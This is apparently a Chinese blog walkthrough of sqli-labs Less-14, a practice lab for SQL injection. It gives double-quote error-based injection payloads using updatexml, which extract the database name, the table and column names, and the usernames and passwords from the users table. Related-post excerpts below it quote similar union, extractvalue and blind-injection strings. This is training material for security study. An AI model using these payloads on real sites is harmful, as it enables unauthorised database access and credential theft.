【网络安全】sqli-labs Less-14 解题详析

原创 已于 2025-03-16 14:44:51 修改 · 3.9k 阅读 · 3 ·
CC 4.0 BY-SA版权
原创文章,禁止转载,否则保留追究法律责任的权利。
文章标签:

#web安全 #数据库 #sql

于 2023-07-24 10:01:45 首次发布
本文详细解析了sqli-labs的Less-14关卡,涉及双引号注入类型的判断,以及如何查询数据库名、表名、用户表列名和字段。通过示例展示了利用SQL注入技术获取security数据库的相关信息。

文章目录

原理及姿势参考:【网络安全】SQL注入原理及常见攻击方法简析

Less-14与Less-13相似,攻击姿势及原理可参考本专栏Less-5:【网络安全】sqli-labs Less-5 解题详析

判断注入类型

经测试可知注入类型为双引号注入

判断注入点个数

在这里插入图片描述
由上下图可知,注入点个数为2

在这里插入图片描述

查库名

1") union select 1,updatexml(1,concat(0x7e,(select database()),0x7e),1)#

在这里插入图片描述

数据库名为security

查表名

1" union select 1,updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31),0x7e),1)#

得到四个表

在这里插入图片描述

查users表的列名

1" and updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),1,31),0x7e),1)#

在这里插入图片描述

查字段

1" and updatexml(1,concat(0x7e,substr((select group_concat(username,password) from users),1,31),0x7e),1)#

在这里插入图片描述

sqli-labs Less-14
qq_42630215的博客
03-28 428
Less-14 POST -Double Injection -Single quotes - String -with twist 与Less-13只有闭合方式不同,都是通过双注入来破解。基本步骤一致。 0x01. uname=1&passwd=1&submit=Submit uname=1"&passwd=1&submit=Submit You have ...
网络安全 - Web 安全靶场 - sqli-labs-php7.zip
10-13
该资源包来源于GitHub上的一个开源项目,由专业的网络安全爱好者或开发者维护和更新。通过sqli-labs-php7.zip,用户可以搭建一个模拟的SQL注入环境,从而在不危害真实系统的前提下,进行各种SQL注入攻击和防御的练习...
sqli-labs (less11-less14)
Xi4or0uji
07-29 1643
less 11 post方法单引号绕过报错注入 这关跟之前get方法的差不了多少,只是get方法换成了post方法 post数据uname=1' union select 1,group_concat(schema_name) from information_schema.schemata#&passwd=1可以得到 uname=1' union select 1,group...
sqli-labs ————less -14
Fly_鹏程万里
05-11 696
Less-14源代码:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head&gt..
Sqlilabs Less-14
Light_inthe_eyes的博客
03-04 215
判断是双引号字符型注入,并且无回显,用报错注入: uname=admin"#&passwd=&submit=Submit 判断列数: uname=admin"+order+by+2#&passwd=&submit=Submit 爆库: uname=-admin"+and+updatexml(1,concat(0x5c,(select+database())),1)#&passwd=&submit=Submit 爆表: uname=admin"+and+u
sqli-labs/Less-14
m0_71299382的博客
11-18 239
sqli-labs第十四关
sqli labs less 14
Xiaoxiaoqiang_的博客
03-02 385
sql注入
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master.zip
01-18
Sqli-labs是一个在线的SQL注入练习平台,提供了一系列关卡供用户练习SQL注入的技巧和防范方法。在这个平台上,用户可以尝试...Sqli-labs旨在帮助网络安全专业人员提高技能和意识,以便更好地应对现实世界中的网络攻击。
sqli-labs-master 靶场环境
最新发布
08-30
sqli-labs-master 靶场环境
Sqli-labs-maste 靶场的下载, phpStudy 下载
09-13
在信息技术安全领域,SQL注入是常见的攻击手段,攻击者通过在Web应用的输入字段中插入恶意SQL语句,试图破坏...phpStudy和Sqli-labs-maste的结合使用,为网络安全的学习和研究提供了一个安全、高效、便捷的学习平台。
SQLi LABS Less 14 报错注入+布尔盲注
热门推荐
wangyuxiang946的博客
06-21 1万+
SQLi 第十四关,SQLi-LABS Less-14SQLi-LABS Less 14SQLiLABS Less14SQLi Less 14
SQL注入实例(sqli-labs/less-5)
Thewei666的博客
08-05 1035
在进行前两句传参时,页面没有发生任何变化,但是当使用单引号闭合时,报错了。通过报错可以确定闭合符号为单引号。
SQLI-LABS Less-13 到 Less-14
Web学习之路
03-24 195
联合注入
[SQLi-LABS] Less-14
Stan冲冲冲
05-12 189
双引号闭合,与上题相似 "and 1=1# "union select count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand()*2)) as a from information_schema.columns group by 2# //爆表 "union select count(*),concat((sel
sqli-labs (less-14)
kukudeshuo的博客
03-09 295
sqli-labs (less-14) 进入14关,输入账号和密码,登入后发现也没有数据返回 uname=admin'&passwd=admin&submit=Submit #无错误显示 uname=admin"&passwd=admin&submit=Submit #有完整错误显示 根据输入"显示的错误信息判断闭合方式为"#,并且为字符型注入 使用Boolean盲注 查看当前数据库长度 uname=a" or length(database())=8#&pas
sqli-labs:less-13/14
Zeker62的博客
08-31 245
less-13和less-14差不多,我们以13为例子 和less-12一样,是一个登录界面: 按照less-12的方法: 进行测试,发现报错,那这里很可能我们注入的字符错误: 我们对passwd进行测试: 发现有个括号没有闭合,那么就可能是('')的组合 在admin里面注入') 过了。那么这个题和12题的区别就是闭合不同咯: 看14题: 现在就可以使用updatexml或者extractva...
Sqli-labsLess-13和Less-14
→_→
04-05 1345
Less-13 POST单引号变形双注入 由题意可知,有单引号闭合的问题,所以在输入框中分别输入 1' 和 1,看返回结果: 报错,从信息中得知还有一个小括号,测试 1') or 1=1 -- # 登录成功发现不在返回用户名和密码信息。 从以上的信息中...
less14~less-17
qq_44598397的博客
03-26 420
LESS-14 输入:admin” 由此可见这个有错误提示且为双引号闭合; 由于有报错提醒故可用报错注入: admin" and extractvalue(1,concat(0x7e,(select database()),0x7e))# Admin” and extractvalue(1,concat(0x7e,(select table_name from information_schem...
[网络安全]sqli-labs Less-1 解题
12-25
SQLi-Labs网络安全领域的一个练习平台,Less-1 是其中一道关于SQL注入攻击的经典题目。在这道题中,你需要利用SQL注入技巧来获取数据库中的敏感信息,通常会涉及HTML表单、GET或POST请求以及对数据库查询构造的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值